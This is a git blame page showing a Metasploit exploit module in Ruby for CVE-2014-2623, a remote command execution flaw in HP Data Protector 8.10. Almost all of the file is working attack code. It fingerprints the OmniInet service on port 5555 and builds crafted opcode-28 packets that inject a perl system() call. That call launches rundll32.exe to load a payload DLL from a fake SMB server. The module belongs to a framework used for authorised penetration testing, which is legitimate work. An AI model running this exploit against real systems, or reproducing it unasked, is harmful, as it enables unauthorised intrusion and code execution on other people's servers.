Files
metasploit-gs/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

148 lines
3.9 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
2015-03-04 12:58:41 -06:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
2015-03-04 11:46:01 -06:00
'Name' => 'HP Data Protector 8.10 Remote Command Execution',
'Description' => %q{
2015-03-04 13:07:10 -06:00
This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
2017-09-13 22:03:34 -04:00
commands can be executed by sending crafted requests with opcode 28 to the OmniInet
service listening on the TCP/5555 port. Since there is a strict length limitation on
2015-03-04 13:07:10 -06:00
the command, rundll32.exe is executed, and the payload is provided through a DLL by a
fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
Windows 7 SP1.
},
2015-03-04 11:46:01 -06:00
'Author' => [
2015-03-04 13:07:10 -06:00
'Christian Ramirez', # POC
2015-03-04 11:46:01 -06:00
'Henoch Barrera', # POC
'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module
],
'References' =>
[
2015-03-04 11:46:01 -06:00
['CVE', '2014-2623'],
['OSVDB', '109069'],
2015-03-04 11:46:01 -06:00
['EDB', '34066'],
2015-03-04 12:27:58 -06:00
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
2015-03-04 12:58:41 -06:00
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Privileged' => true,
'Platform' => 'win',
2022-02-15 18:03:13 +00:00
'Arch' => [ARCH_X86, ARCH_X64],
2015-03-04 12:58:41 -06:00
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
2015-03-04 12:27:58 -06:00
[ 'HP Data Protector 8.10 / Windows', { } ],
],
'DefaultTarget' => 0,
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2014-11-02'))
2015-03-04 11:46:01 -06:00
register_options(
[
Opt::RPORT(5555),
2015-03-04 12:58:41 -06:00
OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
])
2015-03-04 11:46:01 -06:00
2015-03-05 12:27:12 -06:00
deregister_options('FOLDER_NAME')
deregister_options('FILE_CONTENTS')
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
return Exploit::CheckCode::Unknown
end
2016-02-01 15:12:03 -06:00
print_status("HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end
if minor < 11
return Exploit::CheckCode::Appears
end
2015-03-04 11:46:01 -06:00
Exploit::CheckCode::Detected
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
if resp.nil?
return nil
end
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
end
2015-03-04 12:27:58 -06:00
def send_pkt(cmd)
2015-03-04 11:51:58 -06:00
cmd.gsub!("\\", "\\\\\\\\")
2015-03-04 12:27:58 -06:00
pkt = "2\x00"
pkt << "\x01\x01\x01\x01\x01\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x01\x00 "
pkt << "28\x00"
pkt << "\\perl.exe\x00 "
pkt << "-esystem('#{cmd}')\x00"
2015-03-04 11:51:58 -06:00
connect
2015-03-04 12:27:58 -06:00
sock.put([pkt.length].pack('N') + pkt)
2015-03-04 11:51:58 -06:00
disconnect
end
2015-03-04 11:46:01 -06:00
def primer
2015-03-04 11:51:58 -06:00
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
2016-02-01 15:12:03 -06:00
print_status("Trying to execute remote DLL...")
2015-03-04 11:51:58 -06:00
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
2015-03-04 12:27:58 -06:00
send_pkt(sploit)
end
2015-03-04 12:58:41 -06:00
def setup
super
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
unless file_name =~ /\.dll$/
fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
end
end
def exploit
begin
Timeout.timeout(datastore['SMB_DELAY']) {super}
rescue Timeout::Error
# do nothing... just finish exploit and stop smb server...
end
end
end